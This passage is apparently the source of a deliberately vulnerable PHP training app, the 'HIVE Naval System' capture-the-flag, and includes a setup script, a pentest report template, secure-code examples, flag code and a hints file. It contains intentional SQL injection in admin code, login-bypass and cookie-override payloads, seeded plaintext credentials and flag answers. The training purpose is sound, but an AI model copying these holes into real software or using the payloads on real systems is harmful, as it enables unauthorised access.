]; then 112 | # Import schema and data, suppress error if table exists 113 | mysql hive_naval < officers.sql 2>&1 | grep -v "ERROR 1050 (42S01)" 114 | if [ $? -eq 0 ]; then 115 | echo -e "\033[32m✔ Database schema imported successfully.\033[0m" 116 | md5sum officers.sql > .officers_sql.md5 117 | else 118 | echo -e "\033[31m✘ Error importing database schema.\033[0m" 119 | fi 120 | else 121 | echo -e "\033[31m✘ Missing officers.sql - database will be empty!\033[0m" 122 | fi 123 | 124 | # Ensure 'carl' user is present 125 | echo -e "\033[33m🔧 Ensuring 'carl' user is present in the database...\033[0m" 126 | mysql hive_naval -e " 127 | INSERT INTO officers (uuid, rank, name, username, email, password) VALUES 128 | ('cdb525f9-6a36-484e-8aeb-47c8bf097c69', 'Captain', 'Captain Frimpong Carl', 'carl', 'user4@hivenaval.local', 'ilovemywife') 129 | ON DUPLICATE KEY UPDATE rank=VALUES(rank), name=VALUES(name), email=VALUES(email), password=VALUES(password); 130 | UPDATE officers SET username='carl', rank='Captain', name='Captain Frimpong Carl', email='user4@hivenaval.local', password='ilovemywife' WHERE uuid='cdb525f9-6a36-484e-8aeb-47c8bf097c69'; 131 | " 132 | 133 | # Ensure 'admin' user is present 134 | echo -e "\033[33m🔧 Ensuring 'admin' user is present in the database...\033[0m" 135 | mysql hive_naval -e " 136 | INSERT INTO officers (uuid, rank, name, username, email, password) VALUES 137 | ('0b8d6b5d-109d-11f0-8f93-d92a45da78ca', 'Admiral', 'System Admin', 'admin', 'admin@navy.mil', 'navy12345') 138 | ON DUPLICATE KEY UPDATE rank=VALUES(rank), name=VALUES(name), email=VALUES(email), password=VALUES(password); 139 | UPDATE officers SET username='admin', rank='Admiral', name='System Admin', email='admin@navy.mil', password='navy12345' WHERE uuid='0b8d6b5d-109d-11f0-8f93-d92a45da78ca'; 140 | " 141 | fi 142 | 143 | # Set file permissions 144 | echo -e "\033[33m🔒 Securing the hatches...\033[0m" 145 | chmod 600 includes/config.php 146 | 147 | echo -e "\033[32m" 148 | echo "╔══════════════════════════════════════════╗" 149 | echo "║ Hive Naval System successfully deployed ║" 150 | echo "╚══════════════════════════════════════════╝" 151 | echo -e "\033[0m" 152 | 153 | echo -e "\033[36m🚀 Launching system on http://127.0.0.1:9000\033[0m" 154 | echo -e "\033[35mTry these secret codes after setup:" 155 | echo "- Login with the credential of that guy that was careless with his logins: carl/ilovemywife" 156 | echo "- Backup code: 1337" 157 | echo "- Konami code: ↑↑↓↓←→←→BA" 158 | echo "- Right-click admin dashboard\033[0m" 159 | php -S 127.0.0.1:9000 160 | -------------------------------------------------------------------------------- /admin/access_control.php: -------------------------------------------------------------------------------- 1 | ACCESS DENIED

Administrator privileges required

'); 12 | } 13 | 14 | // Security headers 15 | header('X-Content-Type-Options: nosniff'); 16 | header('X-Frame-Options: DENY'); 17 | header('X-XSS-Protection: 1; mode=block'); 18 | 19 | // Get all officers except the last one, set default rank if empty 20 | $users = []; 21 | $result = $conn->query("SELECT id, name, 22 | COALESCE(rank, 'officer') AS rank 23 | FROM officers 24 | WHERE id < (SELECT MAX(id) FROM officers)"); 25 | if ($result) { 26 | $users = $result->fetch_all(MYSQLI_ASSOC); 27 | } else { 28 | $error = "Failed to load users: " . $conn->error; 29 | } 30 | 31 | // Process role updates - vulnerable direct query 32 | if ($_SERVER['REQUEST_METHOD'] === 'POST') { 33 | $user_id = $_POST['user_id']; 34 | $new_role = $_POST['new_role']; 35 | 36 | // No input validation 37 | $conn->query("UPDATE officers SET rank = COALESCE('$new_role', 'officer') WHERE id = $user_id"); 38 | if ($conn->error) { 39 | $error = "Update failed: " . $conn->error; 40 | } else { 41 | $_SESSION['flash'] = "Role updated"; 42 | header("Location: access_control.php"); 43 | exit(); 44 | } 45 | } 46 | ?> 47 | 48 | 49 | 50 | Access Control | HCNMS 51 | 159 | 160 | 161 |
162 |
163 |

Access Control Panel

164 | Back to Admin 165 |
166 | 167 | 168 |
169 | 170 |
171 | 172 | 173 | 174 |
175 | 176 |
177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 209 | 210 | 211 | 212 |
IDNameCurrent RankActions
196 |
197 | 198 | 206 | 207 |
208 |
213 |
214 | 215 | 216 | -------------------------------------------------------------------------------- /REPORT_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | # 📋 Penetration Test Report Template 2 | 3 | **Target**: HIVE Naval Command System 4 | **Tester**: [Your Name] 5 | **Date**: [Date] 6 | **Duration**: [Time Spent] 7 | 8 | --- 9 | 10 | ## Executive Summary 11 | 12 | [Provide a brief overview of your findings. Summarize the most critical vulnerabilities and overall security posture.] 13 | 14 | **Key Findings**: 15 | 16 | - Total Vulnerabilities Found: X 17 | - Critical: X 18 | - High: X 19 | - Medium: X 20 | - Low: X 21 | 22 | **Overall Risk Rating**: [Critical/High/Medium/Low] 23 | 24 | --- 25 | 26 | ## Scope 27 | 28 | **In Scope**: 29 | 30 | - Web Application: http://localhost/ 31 | - All publicly accessible pages 32 | - Authentication mechanisms 33 | - File upload functionality 34 | - Admin panel 35 | 36 | **Out of Scope**: 37 | 38 | - Physical security 39 | - Social engineering 40 | - Denial of Service attacks 41 | 42 | --- 43 | 44 | ## Methodology 45 | 46 | [Describe your testing approach] 47 | 48 | 1. Reconnaissance 49 | 2. Vulnerability Scanning 50 | 3. Manual Testing 51 | 4. Exploitation 52 | 5. Post-Exploitation 53 | 6. Reporting 54 | 55 | **Tools Used**: 56 | 57 | - Burp Suite 58 | - SQLMap 59 | - Browser Developer Tools 60 | - [Other tools] 61 | 62 | --- 63 | 64 | ## Findings 65 | 66 | ### Finding #1: [Vulnerability Name] 67 | 68 | **Severity**: [Critical/High/Medium/Low] 69 | **CVSS Score**: [If applicable] 70 | **CWE**: [CWE Number] 71 | 72 | **Affected Component**: [File/Page/Feature] 73 | 74 | **Description**: 75 | [Detailed description of the vulnerability] 76 | 77 | **Proof of Concept**: 78 | 79 | ``` 80 | [Step-by-step reproduction steps or exploit code] 81 | ``` 82 | 83 | **Impact**: 84 | [What an attacker could achieve with this vulnerability] 85 | 86 | **Remediation**: 87 | [Specific recommendations to fix the vulnerability] 88 | 89 | **References**: 90 | 91 | - [OWASP link] 92 | - [CVE if applicable] 93 | 94 | --- 95 | 96 | ### Finding #2: SQL Injection in Login Form 97 | 98 | **Severity**: Critical 99 | **CVSS Score**: 9.8 100 | **CWE**: CWE-89 101 | 102 | **Affected Component**: `login.php` line 26 103 | 104 | **Description**: 105 | The login form is vulnerable to SQL injection due to direct string interpolation in the SQL query without proper sanitization or prepared statements. 106 | 107 | **Proof of Concept**: 108 | 109 | ``` 110 | 1. Navigate to login.php 111 | 2. Enter username: admin'-- 112 | 3. Enter any password 113 | 4. Click login 114 | 5. Successfully authenticated as admin without knowing the password 115 | ``` 116 | 117 | **SQL Query**: 118 | 119 | ```sql 120 | SELECT * FROM officers WHERE username='admin'--' AND password='anything' 121 | ``` 122 | 123 | **Impact**: 124 | 125 | - Authentication bypass 126 | - Unauthorized access to admin panel 127 | - Potential data exfiltration 128 | - Database manipulation 129 | 130 | **Remediation**: 131 | 132 | ```php 133 | // Use prepared statements 134 | $stmt = $conn->prepare("SELECT * FROM officers WHERE username=? AND password=?"); 135 | $stmt->bind_param("ss", $username, $password); 136 | $stmt->execute(); 137 | $result = $stmt->get_result(); 138 | ``` 139 | 140 | **References**: 141 | 142 | - OWASP SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection 143 | - CWE-89: https://cwe.mitre.org/data/definitions/89.html 144 | 145 | --- 146 | 147 | ### Finding #3: [Add more findings] 148 | 149 | [Continue with the same format for each vulnerability] 150 | 151 | --- 152 | 153 | ## Vulnerability Summary Table 154 | 155 | | ID | Vulnerability | Severity | Status | 156 | | --- | ----------------- | -------- | --------- | 157 | | 1 | SQL Injection | Critical | Exploited | 158 | | 2 | Command Injection | Critical | Exploited | 159 | | 3 | XSS | High | Exploited | 160 | | 4 | IDOR | High | Exploited | 161 | | 5 | File Upload | Critical | Exploited | 162 | 163 | --- 164 | 165 | ## Attack Chain 166 | 167 | [Describe how vulnerabilities can be chained together] 168 | 169 | Example: 170 | 171 | 1. SQL Injection to gain admin access 172 | 2. Access admin panel 173 | 3. Use command injection to execute system commands 174 | 4. Upload web shell for persistent access 175 | 5. Escalate privileges 176 | 6. Full system compromise 177 | 178 | --- 179 | 180 | ## Flags Captured 181 | 182 | | Flag ID | Flag Value | Points | 183 | | ---------- | ------------------------ | ------ | 184 | | FLAG-001 | CTF{carl_loves_his_wife} | 5 | 185 | | FLAG-011 | CTF{sql_injection_pwned} | 10 | 186 | | [Add more] | | | 187 | 188 | **Total Points**: XX/300 189 | 190 | --- 191 | 192 | ## Timeline 193 | 194 | | Time | Activity | 195 | | ----- | ---------------------------------- | 196 | | 00:00 | Started reconnaissance | 197 | | 00:15 | Discovered SQL injection | 198 | | 00:30 | Gained admin access | 199 | | 01:00 | Achieved RCE via command injection | 200 | | 01:30 | Uploaded web shell | 201 | | 02:00 | Completed testing | 202 | 203 | --- 204 | 205 | ## Evidence 206 | 207 | ### Screenshot 1: SQL Injection 208 | 209 | [Insert screenshot showing successful SQL injection] 210 | 211 | ### Screenshot 2: Command Injection 212 | 213 | [Insert screenshot showing command execution] 214 | 215 | ### Screenshot 3: Admin Panel Access 216 | 217 | [Insert screenshot of admin panel] 218 | 219 | --- 220 | 221 | ## Risk Assessment 222 | 223 | ### Critical Risks 224 | 225 | 1. **SQL Injection**: Allows complete database compromise 226 | 2. **Command Injection**: Enables remote code execution 227 | 3. **File Upload**: Permits web shell upload 228 | 229 | ### High Risks 230 | 231 | 1. **IDOR**: Exposes sensitive user data 232 | 2. **XSS**: Enables session hijacking 233 | 234 | ### Medium Risks 235 | 236 | 1. **Session Fixation**: Allows session hijacking 237 | 2. **Information Disclosure**: Reveals sensitive information 238 | 239 | --- 240 | 241 | ## Recommendations 242 | 243 | ### Immediate Actions (Critical) 244 | 245 | 1. Implement prepared statements for all database queries 246 | 2. Sanitize all user inputs before passing to system commands 247 | 3. Implement file type validation and content inspection 248 | 4. Add CSRF tokens to all forms 249 | 250 | ### Short-term Actions (High) 251 | 252 | 1. Implement proper access controls 253 | 2. Add output encoding to prevent XSS 254 | 3. Use secure session management 255 | 4. Enable security headers 256 | 257 | ### Long-term Actions (Medium) 258 | 259 | 1. Conduct regular security audits 260 | 2. Implement Web Application Firewall (WAF) 261 | 3. Security training for developers 262 | 4. Implement security testing in CI/CD pipeline 263 | 264 | --- 265 | 266 | ## Conclusion 267 | 268 | [Summarize your findings and overall assessment] 269 | 270 | The HIVE Naval Command System contains multiple critical vulnerabilities that allow for complete system compromise. Immediate remediation is required for all critical findings. 271 | 272 | --- 273 | 274 | ## Appendix 275 | 276 | ### A. Tools Used 277 | 278 | - Burp Suite Community Edition v2023.x 279 | - SQLMap v1.7.x 280 | - Browser: Chrome/Firefox Developer Tools 281 | 282 | ### B. Testing Environment 283 | 284 | - OS: [Your OS] 285 | - Target: http://localhost/ 286 | - Database: MySQL 287 | 288 | ### C. References 289 | 290 | - OWASP Top 10 2021 291 | - CWE/SANS Top 25 292 | - NIST Guidelines 293 | 294 | --- 295 | 296 | **Report Prepared By**: [Your Name] 297 | **Date**: [Date] 298 | **Signature**: ******\_\_\_****** 299 | -------------------------------------------------------------------------------- /secure_example/README.md: -------------------------------------------------------------------------------- 1 | # 🔒 Secure Code Examples 2 | 3 | This directory contains **secure implementations** of the vulnerable features in the HIVE Naval System CTF. Use these as references to understand how to properly fix the vulnerabilities. 4 | 5 | --- 6 | 7 | ## 📁 Files in This Directory 8 | 9 | ### 1. [`login_secure.php`](login_secure.php) 10 | 11 | **Secure authentication implementation** 12 | 13 | **Vulnerabilities Fixed:** 14 | 15 | - ✅ SQL Injection → Uses prepared statements 16 | - ✅ Session Fixation → Regenerates session ID on login 17 | - ✅ Insecure Cookies → Sets HttpOnly, Secure, SameSite flags 18 | - ✅ CSRF → Implements CSRF token validation 19 | - ✅ Weak Session Config → Proper session settings 20 | 21 | **Key Security Features:** 22 | 23 | ```php 24 | // Prepared statement prevents SQL injection 25 | $stmt = $conn->prepare("SELECT * FROM officers WHERE username = ?"); 26 | $stmt->bind_param("s", $username); 27 | 28 | // Session regeneration prevents fixation 29 | session_regenerate_id(true); 30 | 31 | // Secure cookie configuration 32 | setcookie("naval_user", $username, [ 33 | 'httponly' => true, // No JavaScript access 34 | 'secure' => true, // HTTPS only 35 | 'samesite' => 'Strict' // CSRF protection 36 | ]); 37 | ``` 38 | 39 | --- 40 | 41 | ### 2. [`upload_secure.php`](upload_secure.php) 42 | 43 | **Secure file upload implementation** 44 | 45 | **Vulnerabilities Fixed:** 46 | 47 | - ✅ Unrestricted File Upload → Extension whitelist 48 | - ✅ MIME Type Bypass → Validates actual MIME type 49 | - ✅ Code Execution → Scans content for malicious code 50 | - ✅ Predictable Filenames → Random filename generation 51 | 52 | **Key Security Features:** 53 | 54 | ```php 55 | // Extension whitelist 56 | $allowed_extensions = ['txt', 'pdf', 'doc', 'docx', 'jpg', 'png']; 57 | 58 | // MIME type validation 59 | $finfo = finfo_open(FILEINFO_MIME_TYPE); 60 | $mime_type = finfo_file($finfo, $file_tmp); 61 | 62 | // Content scanning 63 | if (preg_match('/<\?php|<\?=| 19 | 161 | 162 | 163 | 164 |
165 | UNCLASSIFIED // FOR OFFICIAL USE ONLY 166 |
167 | 168 |
169 |
170 |

PERSONNEL PROFILE

171 | ◄ RETURN TO COMMAND CENTER 172 |
173 | 174 |
175 |
176 |
177 | 178 |
179 |
180 |

181 |

182 |
183 |
184 | 185 |
186 |
187 |

SERVICE NUMBER (ID)

188 |

189 |
190 |
191 |

OFFICIAL EMAIL

192 |

193 |
194 |
195 |

CURRENT ASSIGNMENT

196 |

197 |
198 |
199 |

DEPLOYMENT STATUS

200 |

201 |
202 |
203 |

SECURITY CLEARANCE

204 |

205 |
206 |
207 |

LAST LOGIN

208 |

209 |
210 |
211 |
212 |
213 | 214 | 215 |
216 | UNCLASSIFIED // FOR OFFICIAL USE ONLY 217 |
218 | 219 | 220 | -------------------------------------------------------------------------------- /static/js/naval_operations.js: -------------------------------------------------------------------------------- 1 | // UTC Clock and Operational Status 2 | class NavalOperations { 3 | constructor() { 4 | this.initUTCClock(); 5 | this.initOperationalStatus(); 6 | } 7 | 8 | // UTC Clock 9 | initUTCClock() { 10 | this.updateUTCClock(); 11 | setInterval(() => this.updateUTCClock(), 1000); 12 | } 13 | 14 | updateUTCClock() { 15 | const clockElement = document.getElementById('utc-clock'); 16 | if (!clockElement) return; 17 | 18 | const now = new Date(); 19 | 20 | // Format date: DD MMM YYYY 21 | const day = String(now.getUTCDate()).padStart(2, '0'); 22 | const months = ['JAN', 'FEB', 'MAR', 'APR', 'MAY', 'JUN', 'JUL', 'AUG', 'SEP', 'OCT', 'NOV', 'DEC']; 23 | const month = months[now.getUTCMonth()]; 24 | const year = now.getUTCFullYear(); 25 | 26 | // Format time: HH:MM:SS 27 | const hours = String(now.getUTCHours()).padStart(2, '0'); 28 | const minutes = String(now.getUTCMinutes()).padStart(2, '0'); 29 | const seconds = String(now.getUTCSeconds()).padStart(2, '0'); 30 | 31 | clockElement.innerHTML = ` 32 |
${day} ${month} ${year}
33 |
${hours}:${minutes}:${seconds}
34 |
ZULU
35 | `; 36 | } 37 | 38 | // Operational Status 39 | initOperationalStatus() { 40 | const statusElement = document.getElementById('operational-status'); 41 | if (!statusElement) return; 42 | 43 | // Simulate operational data 44 | const status = { 45 | threatcon: 'BRAVO', 46 | fleetStatus: 'DEPLOYED', 47 | activeShips: 47, 48 | personnel: 12450, 49 | readiness: 'HIGH', 50 | lastUpdate: this.getFormattedTime() 51 | }; 52 | 53 | statusElement.innerHTML = ` 54 |
55 | THREATCON: 56 | ${status.threatcon} 57 |
58 |
59 | Fleet Status: 60 | 61 | 62 | 63 | ${status.fleetStatus} 64 | 65 | 66 |
67 |
68 | Active Ships: 69 | ${status.activeShips} 70 |
71 |
72 | Personnel: 73 | ${status.personnel.toLocaleString()} 74 |
75 |
76 | Readiness: 77 | ${status.readiness} 78 |
79 |
80 | Last Update: 81 | ${status.lastUpdate} 82 |
83 | `; 84 | 85 | // Update every 30 seconds 86 | setInterval(() => { 87 | const lastUpdateElement = statusElement.querySelector('.status-row:last-child .status-value'); 88 | if (lastUpdateElement) { 89 | lastUpdateElement.textContent = this.getFormattedTime(); 90 | } 91 | }, 30000); 92 | } 93 | 94 | getFormattedTime() { 95 | const now = new Date(); 96 | const day = String(now.getUTCDate()).padStart(2, '0'); 97 | const months = ['JAN', 'FEB', 'MAR', 'APR', 'MAY', 'JUN', 'JUL', 'AUG', 'SEP', 'OCT', 'NOV', 'DEC']; 98 | const month = months[now.getUTCMonth()]; 99 | const year = now.getUTCFullYear(); 100 | const hours = String(now.getUTCHours()).padStart(2, '0'); 101 | const minutes = String(now.getUTCMinutes()).padStart(2, '0'); 102 | 103 | return `${day} ${month} ${year} ${hours}:${minutes}Z`; 104 | } 105 | 106 | // THREATCON levels and their meanings 107 | static getThreatconInfo(level) { 108 | const levels = { 109 | 'NORMAL': { 110 | color: 'normal', 111 | description: 'General global threat of terrorist activity' 112 | }, 113 | 'ALPHA': { 114 | color: 'alpha', 115 | description: 'General threat of possible terrorist activity' 116 | }, 117 | 'BRAVO': { 118 | color: 'bravo', 119 | description: 'Increased and more predictable threat' 120 | }, 121 | 'CHARLIE': { 122 | color: 'charlie', 123 | description: 'Incident occurred or intelligence received' 124 | }, 125 | 'DELTA': { 126 | color: 'delta', 127 | description: 'Imminent threat or terrorist attack occurring' 128 | } 129 | }; 130 | return levels[level] || levels['NORMAL']; 131 | } 132 | 133 | // Generate random ship names 134 | static getRandomShipName() { 135 | const carriers = ['USS Ronald Reagan', 'USS Nimitz', 'USS Enterprise', 'USS Carl Vinson', 'USS Abraham Lincoln']; 136 | const destroyers = ['USS Arleigh Burke', 'USS John Paul Jones', 'USS Fitzgerald', 'USS Cole', 'USS Mason']; 137 | const cruisers = ['USS Bunker Hill', 'USS Mobile Bay', 'USS Antietam', 'USS Chancellorsville']; 138 | const submarines = ['USS Virginia', 'USS Texas', 'USS Hawaii', 'USS North Carolina']; 139 | 140 | const allShips = [...carriers, ...destroyers, ...cruisers, ...submarines]; 141 | return allShips[Math.floor(Math.random() * allShips.length)]; 142 | } 143 | 144 | // Generate random deployment location 145 | static getRandomLocation() { 146 | const locations = [ 147 | 'Western Pacific', 148 | 'Mediterranean Sea', 149 | 'Arabian Gulf', 150 | 'North Atlantic', 151 | 'South China Sea', 152 | 'Indian Ocean', 153 | 'Norfolk, VA', 154 | 'San Diego, CA', 155 | 'Pearl Harbor, HI', 156 | 'Yokosuka, Japan', 157 | 'Bahrain', 158 | 'Guam' 159 | ]; 160 | return locations[Math.floor(Math.random() * locations.length)]; 161 | } 162 | 163 | // Generate security clearance 164 | static getRandomClearance() { 165 | const clearances = ['CONFIDENTIAL', 'SECRET', 'TOP SECRET']; 166 | const weights = [0.5, 0.35, 0.15]; // Weighted distribution 167 | const random = Math.random(); 168 | 169 | if (random < weights[0]) return clearances[0]; 170 | if (random < weights[0] + weights[1]) return clearances[1]; 171 | return clearances[2]; 172 | } 173 | 174 | // Get deployment status 175 | static getRandomDeploymentStatus() { 176 | const statuses = ['DEPLOYED', 'SHORE DUTY', 'TRAINING', 'IN TRANSIT']; 177 | const weights = [0.3, 0.4, 0.2, 0.1]; 178 | const random = Math.random(); 179 | 180 | if (random < weights[0]) return statuses[0]; 181 | if (random < weights[0] + weights[1]) return statuses[1]; 182 | if (random < weights[0] + weights[1] + weights[2]) return statuses[2]; 183 | return statuses[3]; 184 | } 185 | } 186 | 187 | // Initialize on page load 188 | document.addEventListener('DOMContentLoaded', () => { 189 | new NavalOperations(); 190 | }); 191 | 192 | // Make available globally 193 | window.NavalOperations = NavalOperations; 194 | -------------------------------------------------------------------------------- /admin/view_all_officers.php: -------------------------------------------------------------------------------- 1 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | All Officers | HCNMS 20 | 191 | 192 | 193 | 194 |
195 |
196 |

All Naval Officers

197 | Back to Dashboard 198 |
199 | 200 |
201 | 202 |
203 |
204 |
205 | 206 |
207 |
208 |

209 |

210 |
211 |
212 | 213 |
214 |
215 | ID: 216 | 217 |
218 |
219 | Email: 220 | 221 |
222 |
223 | Department: 224 | 225 |
226 |
227 | Clearance: 228 | 229 |
230 |
231 | 232 | 233 |
234 | View Profile 235 | Delete 236 |
237 | 238 |
239 | 240 |
241 |
242 | 243 | 244 | -------------------------------------------------------------------------------- /static/js/flag_popup.js: -------------------------------------------------------------------------------- 1 | // Flag Popup System - Include this in your pages 2 | // Usage: showFlag('FLAG-001', 'CTF{carl_loves_his_wife}', 5); 3 | 4 | function showFlag(flagId, flagValue, points) { 5 | // Create overlay 6 | const overlay = document.createElement("div"); 7 | overlay.style.cssText = ` 8 | position: fixed; 9 | top: 0; 10 | left: 0; 11 | width: 100%; 12 | height: 100%; 13 | background: rgba(0, 0, 0, 0.8); 14 | z-index: 10000; 15 | display: flex; 16 | align-items: center; 17 | justify-content: center; 18 | animation: fadeIn 0.3s ease; 19 | `; 20 | 21 | // Create popup 22 | const popup = document.createElement("div"); 23 | popup.style.cssText = ` 24 | background: linear-gradient(135deg, #0a192f, #172a45); 25 | border: 3px solid #64ffda; 26 | border-radius: 20px; 27 | padding: 40px; 28 | max-width: 500px; 29 | text-align: center; 30 | box-shadow: 0 0 50px rgba(100, 255, 218, 0.5); 31 | animation: popIn 0.5s cubic-bezier(0.68, -0.55, 0.265, 1.55); 32 | position: relative; 33 | `; 34 | 35 | popup.innerHTML = ` 36 | 119 |
🚩
120 |
FLAG CAPTURED!
121 |
${flagId}
122 |
${flagValue}
123 |
+${points} Points
124 | 125 | `; 126 | 127 | // Add confetti 128 | for (let i = 0; i < 30; i++) { 129 | const confetti = document.createElement("div"); 130 | confetti.className = "confetti"; 131 | confetti.style.left = Math.random() * 100 + "%"; 132 | confetti.style.top = "-10px"; 133 | confetti.style.background = ["#64ffda", "#00ff00", "#ffff00", "#ff00ff"][ 134 | Math.floor(Math.random() * 4) 135 | ]; 136 | confetti.style.animationDelay = Math.random() * 2 + "s"; 137 | popup.appendChild(confetti); 138 | } 139 | 140 | overlay.className = "flag-overlay"; 141 | overlay.appendChild(popup); 142 | document.body.appendChild(overlay); 143 | 144 | // Play sound if available 145 | try { 146 | const audio = new Audio( 147 | "data:audio/wav;base64,UklGRnoGAABXQVZFZm10IBAAAAABAAEAQB8AAEAfAAABAAgAZGF0YQoGAACBhYqFbF1fdJivrJBhNjVgodDbq2EcBj+a2/LDciUFLIHO8tiJNwgZaLvt559NEAxQp+PwtmMcBjiR1/LMeSwFJHfH8N2QQAoUXrTp66hVFApGn+DyvmwhBSuBzvLZiTYIGGS57OihUBELTKXh8bllHAU2jdXvzn0pBSh+zPDajzsKElyx6OyrWBUIQ5zd8sFuJAUuhM/z1YU1Bxdnue3qpVITC0qk4PG8aB0FNIzU8M19KwUmfcvv2o46CRJbr+frrVoVCECa3PLEcSYGLIHO8diJOAcZZ7rs6qZTEwtJo+Dxu2gdBTOM1PDNfiwGJnzK79qPOwoSWa/n661bFQg+mNryw3ElBiuAzvHXiTkHGWa57OqnUxMLSKLf8btoHgU0i9Pwzn4sBSd7yvDajzsKEliu5+utWhUIQJja8sNxJQYrgc7x14k5BxlmuevrpVMTC0ii3/G7aB4FNIvT8M5+LAUne8rw2o87ChJYrufrrVoVCECY2vLDcSUGK4HO8deJOQcZZrns66VTEwtIot/xu2geBTSL0/DOfisFJ3vK8NqPOwoSWK7n661aFQhAmNryw3ElBiuBzvHXiTkHGWa57OulUxMLSKLf8btoHgU0i9Pwzn4rBSd7yvDajzsKEliu5+utWhUIQJja8sNxJQYrgc7x14k5BxlmuevrpVMTC0ii3/G7aB4FNIvT8M5+KwUne8rw2o87ChJYrufrrVoVCECY2vLDcSUGK4HO8deJOQcZZrns66VTEwtIot/xu2geBTSL0/DOfisFJ3vK8NqPOwoSWK7n661aFQhAmNryw3ElBiuBzvHXiTkHGWa57OulUxMLSKLf8btoHgU0i9Pwzn4rBSd7yvDajzsKEliu5+utWhUIQJja8sNxJQYrgc7x14k5BxlmuevrpVMTC0ii3/G7aB4FNIvT8M5+KwUne8rw2o87ChJYrufrrVoVCECY2vLDcSUGK4HO8deJOQcZZrns66VTEwtIot/xu2geBTSL0/DOfisFJ3vK8NqPOwoSWK7n661aFQhAmNryw3ElBiuBzvHXiTkHGWa57OulUxMLSKLf8btoHgU0i9Pwzn4rBSd7yvDajzsKEliu5+utWhUIQJja8sNxJQYrgc7x14k5BxlmuevrpVMTC0ii3/G7aB4FNIvT8M5+KwUne8rw2o87ChJYrufrrVoVCECY2vLDcSUGK4HO8deJOQcZZrns66VTEwtIot/xu2geBTSL0/DOfisFJ3vK8NqPOwoSWK7n661aFQhAmNryw3ElBiuBzvHXiTkHGWa57OulUxMLSKLf8btoHgU0i9Pwzn4rBSd7yvDajzsKEliu5+utWhUIQJja8sNxJQYrgc7x14k5BxlmuevrpVMTC0ii3/G7aB4FNIvT8M5+KwUne8rw2o87ChJYrufrrVoVCECY2vLDcSUGK4HO8deJOQcZZrns66VTEwtIot/xu2geBTSL0/DOfisFJ3vK8NqPOwoSWK7n661aFQhAmNryw3ElBiuBzvHXiTkHGWa57OulUxMLSKLf8btoHgU0i9Pwzn4rBSd7yvDajzsKEliu5+utWhUIQJja8sNxJQYrgc7x14k5BxlmuevrpVMTC0ii3/G7aB4FNIvT8M5+KwUne8rw2o87ChJYrufrrVoVCECY2vLDcSUGK4HO8deJOQcZZrns66VTEwtIot/xu2geBTSL0/DOfisFJ3vK8NqPOwoSWK7n661aFQ==" 148 | ); 149 | audio.volume = 0.3; 150 | audio.play().catch(() => {}); 151 | } catch (e) {} 152 | 153 | // Log to player progress 154 | logFlagCapture(flagId, flagValue, points); 155 | 156 | // Auto-close after 10 seconds 157 | setTimeout(() => { 158 | if (document.body.contains(overlay)) { 159 | overlay.style.animation = "fadeIn 0.3s ease reverse"; 160 | setTimeout(() => overlay.remove(), 300); 161 | } 162 | }, 10000); 163 | } 164 | 165 | function logFlagCapture(flagId, flagValue, points) { 166 | // Send to server for logging 167 | fetch("/log_flag.php", { 168 | method: "POST", 169 | headers: { "Content-Type": "application/json" }, 170 | body: JSON.stringify({ 171 | flag_id: flagId, 172 | flag_value: flagValue, 173 | points: points, 174 | timestamp: new Date().toISOString(), 175 | }), 176 | }).catch(() => {}); 177 | 178 | // Also save to localStorage 179 | const flags = JSON.parse(localStorage.getItem("captured_flags") || "[]"); 180 | if (!flags.find((f) => f.flag_id === flagId)) { 181 | flags.push({ 182 | flag_id: flagId, 183 | flag_value: flagValue, 184 | points: points, 185 | timestamp: new Date().toISOString(), 186 | }); 187 | localStorage.setItem("captured_flags", JSON.stringify(flags)); 188 | } 189 | } 190 | 191 | // Example usage in vulnerable pages: 192 | // After successful SQL injection: 193 | // showFlag('FLAG-011', 'CTF{sql_injection_pwned}', 10); 194 | 195 | // After command injection: 196 | // showFlag('FLAG-021', 'CTF{command_injection_rce}', 15); 197 | -------------------------------------------------------------------------------- /HINTS.md: -------------------------------------------------------------------------------- 1 | # 🎯 HIVE Naval System - Progressive Hints 2 | 3 | > ⚠️ **SPOILER WARNING**: This document contains hints that will help you solve challenges. Try to solve them yourself first! 4 | 5 | --- 6 | 7 | ## 🟢 Level 1 - Getting Started (Easy) 8 | 9 | ### Challenge: Find Default Credentials 10 | 11 |
12 | Hint 1 (Click to reveal) 13 | 14 | Check the README.md file for clues about default accounts. 15 | 16 |
17 | 18 |
19 | Hint 2 20 | 21 | Look for officer names mentioned in the documentation. One of them has a memorable password. 22 | 23 |
24 | 25 |
26 | Solution 27 | 28 | Username: `carl` 29 | Password: `ilovemywife` 30 | 31 |
32 | 33 | --- 34 | 35 | ### Challenge: Find Easter Eggs 36 | 37 |
38 | Hint 1 39 | 40 | Try typing special phrases in input fields on the dashboard. 41 | 42 |
43 | 44 |
45 | Hint 2 46 | 47 | The phrase contains the word "admin" and is polite. 48 | 49 |
50 | 51 |
52 | Solution 53 | 54 | Type "please admin" in any input field on the dashboard to reveal admin credentials. 55 | 56 |
57 | 58 | --- 59 | 60 | ## 🟡 Level 2 - Authentication Bypass (Medium) 61 | 62 | ### Challenge: SQL Injection Login 63 | 64 |
65 | Hint 1 66 | 67 | The login form might be vulnerable to SQL injection. What happens if you add SQL syntax to your input? 68 | 69 |
70 | 71 |
72 | Hint 2 73 | 74 | Try using SQL comments (--) to bypass password verification. 75 | 76 |
77 | 78 |
79 | Hint 3 80 | 81 | The query structure is: `SELECT * FROM officers WHERE username='$username' AND password='$password'` 82 | 83 |
84 | 85 |
86 | Solution 87 | 88 | Username: `admin'--` 89 | Password: (anything) 90 | 91 | This comments out the password check, logging you in as admin. 92 | 93 |
94 | 95 | --- 96 | 97 | ### Challenge: Cookie Manipulation 98 | 99 |
100 | Hint 1 101 | 102 | Check what cookies are set after login. Can you modify them? 103 | 104 |
105 | 106 |
107 | Hint 2 108 | 109 | Look for cookies that might control admin access. The name might be obvious. 110 | 111 |
112 | 113 |
114 | Solution 115 | 116 | Set a cookie: `override_admin=true` 117 | This will grant you admin privileges on next request. 118 | 119 |
120 | 121 | --- 122 | 123 | ### Challenge: Session Fixation 124 | 125 |
126 | Hint 1 127 | 128 | Can you control the session ID before logging in? 129 | 130 |
131 | 132 |
133 | Hint 2 134 | 135 | Try adding a URL parameter to set the session ID. 136 | 137 |
138 | 139 |
